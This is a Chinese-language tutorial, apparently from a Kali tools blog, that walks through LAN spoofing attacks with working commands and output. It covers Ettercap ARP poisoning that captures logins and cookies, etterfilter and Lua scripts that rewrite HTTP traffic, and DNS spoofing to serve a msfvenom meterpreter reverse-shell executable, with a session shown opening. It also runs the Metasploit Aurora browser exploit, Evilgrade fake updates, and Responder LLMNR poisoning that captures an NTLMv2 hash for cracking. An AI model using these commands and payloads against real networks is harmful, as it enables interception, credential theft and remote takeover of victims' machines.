欺骗伪装攻击

Ettercap ARP欺骗,Evilgrade DNS欺骗,Metasploit Responder NetBIOS LLMNR欺骗

ARP欺骗:假扮网关,拦截任何要离开本地网络的流量.

DNS欺骗:DNS名称到IP转换创建一个不正确的响应.能够欺骗用户从攻击者服务器获取恶意数据和用户访问恶意站点.

 

Ettercap  ARP欺骗局域网中的windows7:

ettercap 支持解析多种协议类型 

官方:http://www.ettercap-project.org/
gitHub : https://github.com/Ettercap/ettercap

# -T 启用文本模式 -q 静默运行 -M arp:remote 进行ARP欺骗 参数一:网关IP 参数二:目标IP "空格键" 取消静默模式 在按一下启动静默模式
~# ettercap -T -q -M arp:remote /192.168.2.1// /192.168.2.110//

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team


Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %


Packet visualization restarted...


#空格打开 可以看到流量
TCP  192.168.2.110:50075 --> 125.39.174.72:80 | AP (1248)
POST /member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1 HTTP/1.1.
Host: mcar.cc.
Connection: keep-alive.
Content-Length: 83.
Cache-Control: max-age=0.
Origin: http://mcar.cc.
Upgrade-Insecure-Requests: 1.
Content-Type: application/x-www-form-urlencoded.
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8.
Referer: http://mcar.cc/forum.php?mod=forumdisplay&fid=129&filter=lastpost&orderby=lastpost.
Accept-Encoding: gzip, deflate.
Accept-Language: zh-CN,zh;q=0.9.
Cookie: __cfduid=d23867c9e4dfa44b774d10fc8d1f098ef1535437947; BRFN_2132_saltkey=DbYGPgqu; BRFN_2132_lastvisit=1535434325; BRFN_2132_st_t=0%7C1535437925%7Cd2135a73018d87aa490392bfc6cc6858; BRFN_2132_forum_lastvisit=D_129_1535437925; BRFN_2132_visitedfid=129; BRFN_2132_sendmail=1; Hm_lvt_0b784c51f644f59deba6e333b56c5c72=1535437951; Hm_lpvt_0b784c51f644f59deba6e333b56c5c72=1535437951; yjs_id=e07ffa8d5d54a6fdbd1cef9fceccd890; ctrl_time=1; BRFN_2132_lastact=1535437999%09member.php%09logging.
.
fastloginfield=username&username=admin&password=admin&quickforward=yes&handlekey=lsHTTP : 125.39.174.72:80 -> USER: admin  PASS: admin  INFO: http://mcar.cc/forum.php?mod=forumdisplay&fid=129&filter=lastpost&orderby=lastpost
CONTENT: fastloginfield=username&username=admin&password=admin&quickforward=yes&handlekey=ls

#上面能看到流量中显示的用户名密码 
#ettercap -m ettercap.log -w ettercap.pcap -T -q -M arp:remote /192.168.2.1// /192.168.2.110// -m可以加入日志文本 -w可以保存数据流量回放查看 更多参数设置可用-h查看 

Ettercap操纵网络流量:

第一种是使用Etterfilter框架,框架用于注入BeEF添加恶意代码降级https.

第二种是使用强大的Lua脚本语言操纵数据.

#test.filter

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        pcre_regex(DATA.data, "(Accept-Encoding:).*([\r\n])", "$1 identity$2");
        msg("=");
    }
}

if (ip.proto == TCP && tcp.src == 80) {
    if (pcre_regex(DATA.data, "<\/head>")) {
        pcre_regex(DATA.data, "<\/head>","$1");
        msg("+");
    }
}

编译脚本 errterfilter -o test.ef test.filter 

执行:~# ettercap -T -q -M arp:remote  -F test.ef /192.168.2.1// /192.168.2.110//  #可以写绝对路径

访问站点 可以看到注入的内容

Packet visualization stopped...
=
=
JIT FILTER FAULT: Too many marker for this pcre expression
+
=
=
=
JIT FILTER FAULT: Too many marker for this pcre expression
+
=
=
=
=

判断数据包是否是TCP数据包端口80,search函数会判断是否包含Accept-Encoding如果为true 就修改头部.不进行解压包,msg提示是否执行了.注入脚本找头script进行弹窗.

Lua脚本:

etterpcap -T -q -M arp:remote --lua-script=test.lua /192.168.2.1// /192.168.2.110

description = "Injection Script using Lua"
local hooks = require("hook_points")
local packet = require("packet")
inject = ""

hook_point = hooks.filter

packetrule = function(packet_object)
return(packet_object:is_tcp() and
	packet_object:has_data() and
	(packet_object:dst_port() == 80 or
		packet_object:src_port() == 80))

end

action = function(packet_object)

	p = packet_object
	data = p:read_data()

	if string.find(data, "Accept.Encoding:") then
		s,e = string.find(data, 'Accept.Encoding:.-\n')
		newdata = string.gsub(data, "Accept.Encoding:.-\n",
			"Accept-Encoding: identity" .. string.rep(" ", e - s - 27) .. "\r\n")
		packet.set_data(p, newdata)
		ettercap.log("Downgraded Encoding")
		return
	end

	body = string.upper(data)
	if (string.find(body,'')) then
		s,e = string.find(body, '.-')

		if s then
			title = string.sub(data,s,e)
			s,e = string.find(body, ".-")

			if not s or not e then
				return
			end

			len = e-s
			idata = "" .. title .. inject .. ""
			newstr = string.sub(data, 0, s - 1) .. idata .. string.rep(" ", len - string.len(idata)) .. string.sub(data,e+1,-1)
			ettercap.log("Updating string")
			packet.set_data(p, newstr)
		end
	end
end

DNS欺骗:

第一种NDS缓存投毒,利用DNS缓存注入新的NDS名称记录.

第二种ARP投毒,欺骗后响应DNS请求.但是必须要和目标机器在同一子网中.

Ettercap NDS欺骗:

让目标去下载一个恶意程序   生成一个木马 放到apache2 /var/www/html/    启动apache2

这生产的exe文件需要站点跳转下载 生成一个php木马和其他web页面更佳

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.2.109 LPORT=4444 -f exe > test.exe

修改/etc/ettercap/etter.dns 对https 需要降级为http才能有效

当对方打开网页访问站点 解析的时候就会解析到 指定的站点

################################
# microsoft sucks ;)
# redirect it to www.linux.org
#也可以指定域名

* A 192.168.2.109
* PTR 192.168.2.109
##########################################

启动ettercap 

ettercap -T -q -M arp:remote -P dns_spoof /192.168.2.1// /192.168.2.110//

 可生成各种想要的木马挂到站点

msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.2.109:4444 
[*] Sending stage (206403 bytes) to 192.168.2.110
[*] Meterpreter session 2 opened (192.168.2.109:4444 -> 192.168.2.110:51046) at 2018-08-29 13:57:44 +0800

meterpreter > 

evilgrade工具:https://tools.kali.org/sniffingspoofing/isr-evilgrade 

注入虚假更新,有很多模块供使用, 安装apt-get install isr-evilgrade

查看流量目标机器发起的GET请求 Host地址 XXX.XXX A LHOST,这种方式太过局限性.加入木马.exe文件是非常好的组合.

使用IE浏览器的极光漏洞MS10-002:

msf > db_status 
[*] postgresql connected to msf
msf > search ms10_002

Matching Modules
================

   Name                                        Disclosure Date  Rank    Description
   ----                                        ---------------  ----    -----------
   exploit/windows/browser/ms10_002_aurora     2010-01-14       normal  MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
   exploit/windows/browser/ms10_002_ie_object  2010-01-21       normal  MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free


msf > use exploit/windows/browser/ms10_002_aurora 
msf exploit(windows/browser/ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/browser/ms10_002_aurora) > show options 
msf exploit(windows/browser/ms10_002_aurora) > set LHOST 192.168.2.109
LHOST => 192.168.2.109
msf exploit(windows/browser/ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(windows/browser/ms10_002_aurora) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.2.109:443 
msf exploit(windows/browser/ms10_002_aurora) > [*] Using URL: http://0.0.0.0:8080/wMg2vf
[*] Local IP: http://192.168.2.109:8080/wMg2vf
[*] Server started.
msf exploit(windows/browser/ms10_002_aurora) > 

并没有成功!!! 可以使用SET和BeFF试试

NetBIOS欺骗和LLMNR欺骗:

NetBIOS和LLMNR是Microsoft针对工作组和域设计的名称解析协议.DNS解析失败后会使用NetBIOS和LLMNR搜索名称.

NetBIOS基于广播,LLMNR基于多播,LLMNR支持IPv6 前者不支持.

使用Responder攻击: GitHub:https://github.com/lgandx/Responder

启动:

responder -I wlan0 -rPv

在windows中打开浏览器 输入一个不存在的地址比如\\fuck 等等 会看到发送过来的请求

[*] [LLMNR]  Poisoned answer sent to 192.168.2.110 for name fuck
[*] [LLMNR]  Poisoned answer sent to 192.168.2.110 for name fuck
[SMBv2] NTLMv2-SSP Client   : 192.168.2.110
[SMBv2] NTLMv2-SSP Username : ADMIN\Administrator
[SMBv2] NTLMv2-SSP Hash     : Administrator::ADMIN:955d0626db69b114:F77CDA7D495A387F90A4E247E798E7B4:0101000000000000C0653150DE09D201D97F643AF37AEE90000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000300000923364546A1ABC82F5A7B2556F6C5A898C42F7B5EE9D8406136C706E5C55BBE60A001000000000000000000000000000000000000900120063006900660073002F006600750063006B00000000000000000000000000

/usr/share/responder/logs/ 这在个目录下会看到 抓到的凭据 多跑几分钟才能获得更多的凭据

然后就可以使用 john 破解NTLMv2哈希了

你可能感兴趣的:(kaliTools)